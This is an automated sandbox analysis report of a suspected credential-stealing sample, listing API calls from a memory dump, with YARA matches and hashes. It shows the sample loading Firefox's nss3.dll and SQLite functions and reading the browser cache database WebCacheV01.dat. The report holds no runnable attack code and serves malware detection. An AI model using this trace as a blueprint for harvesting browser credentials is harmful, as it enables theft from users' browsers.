• Sleep.KERNEL32(00000064), ref: 00416EEB
• FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,004536AC,0041753F,00000008,00000000,00000000,?,004176FC,?,00000000), ref: 00416EF4
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ChangeCloseFindNotificationSleep
• String ID:
• API String ID: 1821831730-0

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0

APIs
  • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
• memcpy.MSVCRT ref: 00406335
• memcpy.MSVCRT ref: 00406386
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcpy$??2@
• String ID:
• API String ID: 3700833809-0

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0

APIs
  • Part of subcall function 00410A52: memset.MSVCRT ref: 00410A9A
  • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB1
  • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB9
  • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B14
  • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B22
  • Part of subcall function 004086BA: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00410A06,00000000,?,00000000,?,00000000), ref: 004086D2
  • Part of subcall function 004086BA: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004086E6
  • Part of subcall function 004086BA: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00411ED6), ref: 004086EF
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 00410A10
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcslen$File$Time$CloseCompareCreateHandlememset
• String ID:
• API String ID: 4204647287-0

APIs
• SetFilePointerEx.KERNELBASE(004057A8,?,?,00000000,00000000,00000000,00405E25,00000000,00000000,?,00000000,004057A8), ref: 004057EE
  • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0

APIs
• GetPrivateProfileIntW.KERNEL32 ref: 00413E45
  • Part of subcall function 00413CAE: memset.MSVCRT ref: 00413CCD
  • Part of subcall function 00413CAE: _itow.MSVCRT ref: 00413CE4
  • Part of subcall function 00413CAE: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00413CF3
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4232544981-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(?,?,00411BC7,?,?,00403557,?), ref: 00444436
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00413627: LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
  • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
  • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
  • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
  • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
  • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004134F7,00000104,004134F7,00000000,?), ref: 0041361E
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressProc$FileLibraryLoadModuleName
• String ID:
• API String ID: 3821362017-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(00000000,00406DBF,?,00000000,?,?,?,?,?,00000000,?), ref: 00413408
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0040DDA6,00000000,0044AF64,00000002,?,0040FF40,00000000,00000000,?), ref: 004089B3
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• EnumResourceNamesW.KERNELBASE(?,?,004141E0,00000000), ref: 00414275
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindClose.KERNELBASE(?,0040933E,?,00000000,?,004127ED,*.*,?), ref: 00409432
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
                                                                                                                                                                  • Instruction ID: 95e4874612f61a4c2f5820174f699a9a2e50adc9900ffd5901b80c85968e45e3
                                                                                                                                                                  • Opcode Fuzzy Hash: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
                                                                                                                                                                  • Instruction Fuzzy Hash: 7BC04C35510B118BEF218B12C989793B3E4AF00757F40C818949685851D77CE454CE18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                  • Opcode ID: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
                                                                                                                                                                  • Instruction ID: 7aa4b53cbdd50d27f0544b0d73f3b09e9b9e978b4a3a64aa4ec168f40bbc8e5c
                                                                                                                                                                  • Opcode Fuzzy Hash: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
                                                                                                                                                                  • Instruction Fuzzy Hash: 89B012B92104005BCF0807349C4904D36505F456317300B3CB033C01F0D730CCA0BA00
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                  • Opcode ID: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
                                                                                                                                                                  • Instruction ID: 06f107d5783c69a41ddb44c60f44fa238db6365feab173ebf779541cd7ebc08f
                                                                                                                                                                  • Opcode Fuzzy Hash: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
                                                                                                                                                                  • Instruction Fuzzy Hash: E1C09B39544301BFDF114F40FE05F09BB61AB84F05F004414B344240B282714414EB57
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6f77371c8789c3266b9f1932ef178477fe063e167a465118b7ddcb6402bacfed
                                                                                                                                                                  • Instruction ID: fa567e0f167378dcabf243c4c44df542d601d1aca3ea04bf4c0b19c361688719
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f77371c8789c3266b9f1932ef178477fe063e167a465118b7ddcb6402bacfed
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A317C31901216EFDF14AF25D9817DA73A4FF00B55F14412BF825AB280DB38EDA08BD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                    • Part of subcall function 004057D2: SetFilePointerEx.KERNELBASE(004057A8,?,?,00000000,00000000,00000000,00405E25,00000000,00000000,?,00000000,004057A8), ref: 004057EE
                                                                                                                                                                  • memcpy.MSVCRT ref: 00405E6E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 609303285-0
                                                                                                                                                                  • Opcode ID: 69c5ce9f8364cb3a2f3d9952414f58f868eb9a31ba510d0c6d062cd66918fe31
                                                                                                                                                                  • Instruction ID: b6d0ac0748dce8c6543b82d29fb895a5afc24863716f8b43ab814fbacadff293
                                                                                                                                                                  • Opcode Fuzzy Hash: 69c5ce9f8364cb3a2f3d9952414f58f868eb9a31ba510d0c6d062cd66918fe31
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F11B272500908BBD711A755C844F9F77ACEF84318F15807BF94573182C738AE068BE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2081463915-0
                                                                                                                                                                  • Opcode ID: 5d18b3e2f7875cbfa1b7883ec22a938669b6fc3c83f0355837b3f79f1fd7a5de
                                                                                                                                                                  • Instruction ID: 08e2259bb844cdb7583518af71a3b249da553f2a004d57c4b783ea4beab812a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d18b3e2f7875cbfa1b7883ec22a938669b6fc3c83f0355837b3f79f1fd7a5de
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B118871600605AFDB10DF65C8C199AB7F8FF04314F11853EE416E7281EB34F9158B68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0c41fac1026caa394f1d8b7ace6411e333aacae98e81f6c1a106480c6c3d5a56
                                                                                                                                                                  • Instruction ID: e0041a49ab5f8a8a6f79e1cdbe6ba366fc772cb499ee81fd5c165662a01707c3
                                                                                                                                                                  • Opcode Fuzzy Hash: 0c41fac1026caa394f1d8b7ace6411e333aacae98e81f6c1a106480c6c3d5a56
                                                                                                                                                                  • Instruction Fuzzy Hash: 38F0D1B6308E02EAE320252659807FB029ADBC039BB24442FF949C6242EE7CCCC55229
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004057C0: CloseHandle.KERNEL32(000000FF,00405750,00000000,?,00409A41,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409F26,?,0040A0FE,000000FF), ref: 004057C8
                                                                                                                                                                    • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00409A41,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409F26,?,0040A0FE,000000FF,00000000,00000104), ref: 004057AD
                                                                                                                                                                    • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2136311172-0
                                                                                                                                                                  • Opcode ID: 81d98ab7555efe12e5c8b48e24a2d6677c0216f0edfc1775a14d27b6400d9af5
                                                                                                                                                                  • Instruction ID: 00704370d8ec878584a64fe5f9f18aab24b7d249e6cd1ef38c395e5c556ec921
                                                                                                                                                                  • Opcode Fuzzy Hash: 81d98ab7555efe12e5c8b48e24a2d6677c0216f0edfc1775a14d27b6400d9af5
                                                                                                                                                                  • Instruction Fuzzy Hash: 190181B5415A00DFE7205B30C905BA776E8EF51315F10893FE595E72C1EB7C9480DAAE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1936579350-0
                                                                                                                                                                  • Opcode ID: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
                                                                                                                                                                  • Instruction ID: 8918756149df837d9eea435be632a3e0a17df07a668273fb2c59ff5331204d46
                                                                                                                                                                  • Opcode Fuzzy Hash: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
                                                                                                                                                                  • Instruction Fuzzy Hash: 2BC08C724182100AD650FF79280205622D49E82320301882FE091E3142D53848014344
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                  • Opcode ID: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
                                                                                                                                                                  • Instruction ID: def78aeb235da03500d5bf48ca01037dd20a397eb60980b6de46ef9d9da7be76
                                                                                                                                                                  • Opcode Fuzzy Hash: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
                                                                                                                                                                  • Instruction Fuzzy Hash: ACC01272420B018FF7209E11C406722B3E4EF0077BF618C0D909481482C77CD4408A48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                  • Opcode ID: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
                                                                                                                                                                  • Instruction ID: eebb639015016b4d35185c1cf15d7584ef51e0a9315dec3cbabf5363aa789e86
                                                                                                                                                                  • Opcode Fuzzy Hash: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
                                                                                                                                                                  • Instruction Fuzzy Hash: C5C0127A4107028BF7308F21C509322B2E5AF0072BF708C0D90D081482CB7CD0808A08
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                  • Opcode ID: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
                                                                                                                                                                  • Instruction ID: c34dd2395d73de7fd8324248a47ac8fcc6ed20e97332430ae650d69d176587ff
                                                                                                                                                                  • Opcode Fuzzy Hash: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
                                                                                                                                                                  • Instruction Fuzzy Hash: C8900286455511116C0425756C0760911480892176335074A7032959D1CE1C8150601C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00443A8C
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00443AA3
                                                                                                                                                                  • memset.MSVCRT ref: 00443AD6
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00443AEC
                                                                                                                                                                  • wcscat.MSVCRT ref: 00443AFD
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00443B23
                                                                                                                                                                  • wcscat.MSVCRT ref: 00443B34
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00443B5B
                                                                                                                                                                  • wcscat.MSVCRT ref: 00443B6C
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
                                                                                                                                                                  • LoadLibraryW.KERNEL32(sqlite3.dll,?,00000000,00000000), ref: 00443BA5
                                                                                                                                                                  • LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000000,00000000), ref: 00443BB3
                                                                                                                                                                  • LoadLibraryW.KERNEL32(nss3.dll,?,00000000,00000000), ref: 00443BC3
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00443BF8
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00443C05
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00443C12
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00443C1F
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00443C2C
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00443C39
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00443C46
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
                                                                                                                                                                  • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                                                                                  • API String ID: 2522319644-522817110
                                                                                                                                                                  • Opcode ID: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
                                                                                                                                                                  • Instruction ID: 5ad66febf3ba3de4182efca1dfca8304e8a02b444a88a93b5109a45c6fbe2280
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E5153B1940719AAEB20FFA28D49F47B6E8AF58B04F1109ABE549D2141E77CE644CF18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4218492932-0
                                                                                                                                                                  • Opcode ID: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
                                                                                                                                                                  • Instruction ID: d236c1b17a1aae76216467299f6e18822a0d202c31a727bef5ceca0d2f67f94c
                                                                                                                                                                  • Opcode Fuzzy Hash: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
                                                                                                                                                                  • Instruction Fuzzy Hash: B31184B3D005186BDB00EFA4DC49EDAB7ACEB5A210F454937FA15DB141E638E6448798
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417BF2
                                                                                                                                                                    • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
                                                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00417C19
                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00417C42
                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00417C5D
                                                                                                                                                                  • free.MSVCRT(?,0044C838,?), ref: 00417C8B
                                                                                                                                                                    • Part of subcall function 00416D4F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76D25970,?,00416E7A,?), ref: 00416D6D
                                                                                                                                                                    • Part of subcall function 00416D4F: malloc.MSVCRT ref: 00416D74
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                                                                  • Opcode ID: 8bfb20d829e2964922284bcc965883c1a7f62db9999a68da7033c4551d0de9ee
                                                                                                                                                                  • Instruction ID: 86e7f975cda22aef79341c94f36a987d619a37d11feed098ff88b3a8796ba2f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 8bfb20d829e2964922284bcc965883c1a7f62db9999a68da7033c4551d0de9ee
                                                                                                                                                                  • Instruction Fuzzy Hash: BA11B234E01228BBDB11ABA2DD8DCDF7F78EF85750B20005BF40592211E7784A80DBE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00408CC4
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408CE3
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00408D03
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                  • String ID: .$1k@$nss3.dll
                                                                                                                                                                  • API String ID: 3541575487-3908353483
                                                                                                                                                                  • Opcode ID: 44fa9e536a02e76a834846768dd1f10842e2d891e0e560e34b8b660adb550914
                                                                                                                                                                  • Instruction ID: f3d79de5d6fec64b9baa04ebfd9a669330ca9081903d010b6bc69252f5057639
                                                                                                                                                                  • Opcode Fuzzy Hash: 44fa9e536a02e76a834846768dd1f10842e2d891e0e560e34b8b660adb550914
                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF0BB759005246BDF205B64EC4C6ABB7BCFF45365F000176ED06A71C1D7749D458A98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
                                                                                                                                                                    • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
                                                                                                                                                                    • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
